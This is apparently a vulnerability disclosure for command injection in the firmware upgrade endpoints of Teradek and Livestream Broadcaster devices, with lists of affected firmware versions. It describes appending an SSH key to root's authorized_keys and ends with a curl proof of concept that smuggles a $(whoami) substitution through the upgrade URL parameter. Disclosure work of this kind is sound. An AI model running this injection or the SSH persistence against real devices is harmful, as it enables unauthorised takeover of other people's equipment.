CVE-2020-27685 - Teradek devices upgrade Remote Code Execution

The endpoint to upgrade a Teradek Device has an option to pass along a http url to download the firmware. The Upgrade endpoint performs a curl/wget request without sanitizing the http url being provided. On the Teradek devices you can set up a login feature to allow only authenticated users upgrade but by default it’s not enabled. Originally disclosed to Teradek on October 18th 2019 at 9:53 AM EST.

Effected device firmwares

  • BoltManager - 1.0.5 (Uncertain)
  • Bond II (Legacy) - 7.3.14 (EOL)
  • Bond Pro (Legacy) - 7.3.14, 7.3.17 (EOL)
  • Brik - 7.22 (EOL)
  • Colr - 1.2.11 (Pending)
  • Clip - 1.1.3 (EOL)
  • Cube - 7.3.14 (EOL)
  • Cube Pro - 7.3.14 (EOL)
  • Slice 600/700 - 8.2.7 (Patched)
  • Cube 600/700 - 8.2.7 (Patched)
  • Bond 600/700 - 8.2.7 (Patched)
  • OMOD - 1.2.10 (Uncertain)
  • ServPro - 2.1.4 (Pending)
  • Slice - 7.3.14 (EOL)
  • Sphere - 1.1.0 (EOL)
  • T-Rax - 1.3.5 (Pending)
  • T-Rax 700 - 8.2.7 (Patched)
  • Vidiu - 3.0.8 (EOL)
  • Vidiu Mini - 3.0.8 (EOL)
  • Vidiu Go - 3.1.7 (Patched)
  • Vidiu Pro - 3.1.7 (Patched)

CVE-2020-27686 - Livestream Broadcaster devices upgrade Remote Code Execution

Similar to the Teradek upgrade RCE the broadcaster series of devices suffer from the same vulnability but there isn’t a way to add authenication to the device to mitigate a bit. Also the Livestream Broadcaster devices have an SSH server enabled which with exploiting you are able to append your own SSH public key to /root/.ssh/authorized_keys and login to the device remotely. Orignally disclosed to Livestream/Vimeo on October 17th 2019 at 7:09 PM EST.

Effected device firmware

  • Livestream Broadcaster - 2.1.6
  • Livestream Broadcaster Mini - 2.1.6
  • Livestream Broadcaster Pro - 2.1.6

Location of input injection

HTTP Query injection

Location of RCE

RCE

Proof-of-Concept

You can download the proof of concept from my github here. Below is a simple CURL command exploiting the RCE.

curl -X POST \
'http://172.16.1.1/cgi-bin/upgrade.cgi' \
-d "type=http&uploadfile=http://172.16.1.5:8000/%24%28whoami%29"